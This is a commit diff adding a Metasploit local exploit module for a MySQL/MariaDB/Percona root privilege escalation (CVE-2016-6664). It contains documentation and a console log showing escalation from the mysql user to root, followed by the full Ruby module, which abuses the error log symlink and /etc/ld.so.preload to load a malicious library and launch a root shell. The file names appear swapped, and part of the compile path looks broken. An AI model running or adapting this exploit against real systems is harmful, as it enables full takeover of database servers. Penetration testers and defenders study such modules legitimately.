Land rapid7#7605, Mysql privilege escalation, CVE-2016-6664

Author: Brent Cook

data/exploits/CVE-2016-6664/2016-6664.out

@@ -0,0 +1,127 @@
+
+## Notes
+
+This exploit was tested on ubuntu 14 and 16. As it relies on log file location and service restarting, success on other linux distributions depends greatly.
+
+## Creating A Testing Environment
+
+There are a few requirements for this module to work:
+
+  1. mysql must be started by running mysql_safe
+  2. the error log must be active
+  3. mysql logging through syslog must not enabled
+  4. mysql automatic restart must be enabled
+
+  Using Ubuntu 16.04:
+
+  1. install mariadb - `apt-get -y install mariadb-server`
+  2. disable syslog - `sed -i -e "s/syslog/#syslog/g" /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf`
+  3. enable error log - `sed -i -e "s/skip_log_error/#skip_log_error/g" /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf`
+  4. enable service - `systemctl enable mysql.service`
+  5. start service - `systemctl start mysql.service`
+
+This module has been tested against the following versions of mysql running on Ubuntu 16.04:
+
+  1. MariaDB 10.0.27
+
+On Ubuntu 14.04:
+
+  1. MySQL 5.5.35
+  2. MariaDB 5.5.52
+
+On Debian 8.6
+
+  1. MySQL 5.5.53
+
+This module was not tested against, but may work against:
+
+  * MySQL
+     <= 5.5.51
+     <= 5.6.32
+     <= 5.7.14
+
+  * MariaDB
+     <= 5.5.50
+
+  * Percona Server
+     < 5.5.51-38.2
+     < 5.6.32-78-1
+     < 5.7.14-8
+
+  * Percona XtraDB Cluster
+     < 5.6.32-25.17
+     < 5.7.14-26.17
+     < 5.5.41-37.0
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  4. Do: `use exploit/linux/local/mysql_priv_esc`
+  5. Do: `set session #`
+  6. Do: `set verbose true`
+  7. Do: `exploit`
+
+## Options
+
+  **WritableDir**
+
+  A folder we can write files to.  Defaults to /tmp
+
+  **ErrorLog**
+
+  The mysql service error log file. The location of this file is set on the configuration files. Defaults to /var/log/mysql/error.log
+
+  **BackdoorShell**
+
+  The shell that will be launched using elevated privileges.  Defaults to /bin/bash
+
+  **COMPILE**
+
+  If we should live compile on the system, or drop pre-created binaries.  `Auto` will determine if gcc/libs are installed to compile live on the system.  Defaults to `Auto`
+
+## Scenarios
+
+### Ubuntu 16.04 (with Linux 4.4.0-21-generic)
+### MariaDB 10.0.27 (MariaDB-0ubuntu0.16.04.1)
+
+#### Initial Access
+
+    Use whatever means to get a session back to metaploit ith the mysql account, usually dropping a webshell, connecting back to metaploit and escalate to mysql.
+
+#### Escalate to root
+
+msf exploit(mysql_priv_esc) >
+[*] Sending stage (36 bytes) to 192.168.205.64
+[*] Command shell session 45 opened (192.168.205.52:443 -> 192.168.205.64:51400) at 2016-11-16 21:44:16 +0000
+
+msf exploit(mysql_priv_esc) > set session 45
+session => 45
+msf exploit(mysql_priv_esc) > run
+
+[+] mysqld_safe is running
+[+] The current user is mysql
+[*] Checking if gcc are installed
+[*] Checking if gcc are installed
+[*] Dropping pre-compiled exploit on system
+[*] Writing privesclib to /tmp/fYAMgzW5.so
+[*] Max line length is 65537
+[*] Writing 8240 bytes in 1 chunks of 19877 bytes (octal-encoded), using printf
+[*] Seting up the preload trap
+[*] cp /bin/bash /tmp/mysqlrootsh
+[*] touch -f /var/log/mysql/error.log; mv /var/log/mysql/error.log /var/log/mysql/error.log.tmp && ln -s /etc/ld.so.preload /var/log/mysql/error.log
+[*] kill $(pgrep mysqld)
+[*] /bin//sh: 27: kill: Operation not permitted
+
+[*] Waiting for mysqld to restart...
+[*] Executing escalation.
+[*] echo /tmp/fYAMgzW5.so > /etc/ld.so.preload
+[*] chmod 755 /etc/ld.so.preload
+[*] /usr/bin/sudo 2>/dev/null >/dev/null
+[*] /tmp/mysqlrootsh -p -c "rm -f /etc/ld.so.preload; rm -f /tmp/fYAMgzW5.so"
+[*] /tmp/mysqlrootsh -p
+[*] Cleanup done.
+[!] This exploit may require manual cleanup of '/tmp/mysqlrootsh' on the target
+msf exploit(mysql_priv_esc) > sessions -i 45 -c "id"
+[*] Running 'id' on shell session 45 (192.168.205.64)
+uid=112(mysql) gid=121(mysql) euid=0(root) groups=121(mysql)

documentation/modules/exploit/linux/local/mysql_priv_esc.md

@@ -0,0 +1,216 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require "msf/core"
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'           => 'MySQL / MariaDB / Percona   -   Root Privilege Escalation',
+        'Description'    => %q{
+          MySQL-based databases including MySQL, MariaDB and Percona are affected
+          by a privilege escalation vulnerability which can let attackers who have
+          gained access to mysql system user to further escalate their privileges
+          to root user allowing them to fully compromise the system.
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'x2020 <[email protected]>',  # Module
+            'Dawid Golunski'            # Discovery
+          ],
+        'DisclosureDate' => 'Nov 01 2016',
+        'Platform'       => [ 'linux'],
+        'SessionTypes'   => ['shell', 'meterpreter'],
+        'Targets'        => [ ['Automatic', {}] ],
+        'DefaultTarget'  => 0,
+        'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => true
+        },
+        'References'     =>
+          [
+            [ 'EDB', '40679'],
+            [ 'CVE', '2016-6664'],
+            [ 'URL', 'https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html']
+          ]
+      ))
+    register_options(
+      [
+        OptString.new('ErrorLog', [ true, 'The error log file', '/var/log/mysql/error.log' ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
+        OptString.new('BackdoorShell', [ true, 'The shell path', '/bin/bash' ]),
+        OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
+      ], self.class)
+  end
+
+  def check
+
+    def check_reqs?()
+      # should have mysqld_safe running
+      check_command = "if pgrep mysqld; "
+      check_command << "then echo OK; "
+      check_command << "fi"
+      output = cmd_exec(check_command).gsub("\r", '')
+      vprint_status output
+      if output['OK'] == 'OK'
+        vprint_good "mysqld_safe is running"
+        return true
+      end
+      print_error "mysqld process not running"
+      false
+    end
+
+    def mysql_user?()
+      # test for mysql user
+      mysql = cmd_exec("id | grep -E '(mysql)'")
+      if not mysql.include?("mysql")
+        print_error "The current session user (#{mysql}) is not mysql"
+        return false
+      end
+      vprint_good "The current user is mysql"
+      true
+    end
+
+    def preload_exists?()
+      if exists?("/etc/ld.so.preload")
+        print_error "Found ld.so.preload. Exiting for safety."
+        return true
+      end
+      false
+    end
+
+    def sudo_exists?()
+      @sudo = cmd_exec('which sudo')
+      if @sudo.include?("sudo")
+        return true
+      end
+      false
+    end
+
+    if check_reqs? and mysql_user? and sudo_exists?
+      if preload_exists?
+        return CheckCode::Detected
+      end
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+    end
+
+    # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.
+    def has_prereqs?()
+      vprint_status('Checking if gcc is installed')
+      if target.name == "Ubuntu"
+        gcc = cmd_exec('which gcc')
+        if gcc.include?('gcc')
+          vprint_good('gcc is installed')
+        else
+          print_error('gcc is not installed.  Compiling will fail.')
+        end
+        return gcc.include?('gcc')
+      else
+        return false
+      end
+    end
+
+    compile = has_prereqs?
+    if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
+      if has_prereqs?()
+        compile = true
+        vprint_status('Live compiling exploit on system')
+      else
+        vprint_status('Dropping pre-compiled exploit on system')
+      end
+    end
+
+    # build file names and locations
+    privesclib_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + ".so"
+    privescsrc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + ".c"
+    pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
+    payload_path = datastore["WritableDir"] + "/" + rand_text_alpha(8)
+    backdoorsh = datastore["BackdoorShell"]
+    backdoorpath = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
+    error_log_file = datastore["ErrorLog"]
+
+    # setup the files
+    rm_f pwn_file
+    if compile
+      vprint_status "Writing pwn source to #{privescsrc_file}"
+      rm_f privescsrc_file
+      write_file(privescsrc_file, privesclib_file)
+      cmd_exec("gcc -Wall -fPIC -shared -o #{privesclib_file} #{privescsrc_file} -ldl")
+      register_file_for_cleanup(privescsrc_file)
+    else
+      # privesclib.so file
+      path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-6664', '2016-6664.out')
+      fd = ::File.open( path, "rb")
+      privesclib = fd.read(fd.stat.size)
+      fd.close
+      vprint_status "Writing privesclib to #{privesclib_file}"
+      backdoorpath = "/tmp/mysqlrootsh" # hardcoded into privesclib.so
+      write_file(privesclib_file, privesclib)
+    end
+    register_file_for_cleanup(backdoorpath)
+    register_file_for_cleanup(privesclib_file)
+
+    # the actual pwning
+    def do_pwn(privesclib_file, suidbin, backdoorpath, payload_path)
+      print_status "Executing escalation."
+      do_cmd_exec("echo #{privesclib_file} > /etc/ld.so.preload")
+      do_cmd_exec("chmod 755 /etc/ld.so.preload")
+      do_cmd_exec("#{suidbin} 2>/dev/null >/dev/null")
+      do_cmd_exec("#{backdoorpath} -p -c \"rm -f /etc/ld.so.preload; rm -f #{privesclib_file}\"")
+      do_cmd_exec("#{backdoorpath} -p")
+    end
+
+    # reset system state
+    def do_cleanup(error_log_file)
+      cmd_exec("rm -f #{error_log_file}")
+      cmd_exec("mv -f #{error_log_file}.tmp #{error_log_file}")
+      cmd_exec("if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload; fi")
+      vprint_status "Cleanup done."
+    end
+
+    # util cmd_exec with verbose print
+    def do_cmd_exec(cmd)
+      vprint_status cmd
+      r = cmd_exec(cmd)
+      if r != ""
+        print_status r
+      end
+    end
+
+    # initial setup for pwning
+    vprint_status "Seting up the preload trap"
+    do_cmd_exec("cp #{backdoorsh} #{backdoorpath}")
+    do_cmd_exec("touch -f #{error_log_file}; mv #{error_log_file} #{error_log_file}.tmp && ln -s /etc/ld.so.preload #{error_log_file}")
+    do_cmd_exec("kill $(pgrep mysqld)")
+
+    # wait for restart
+    print_status "Waiting for mysqld to restart..."
+    cmd_exec("while :; do { sleep 0.1; if [ -f /etc/ld.so.preload ]; then { echo #{privesclib_file} > /etc/ld.so.preload; rm -f #{error_log_file}; break; } fi } done", nil, 125)
+
+    # pwn the system
+    do_pwn(privesclib_file, @sudo, backdoorpath, payload_path)
+
+    # cleanup the mess
+    do_cleanup(error_log_file)
+
+  end
+end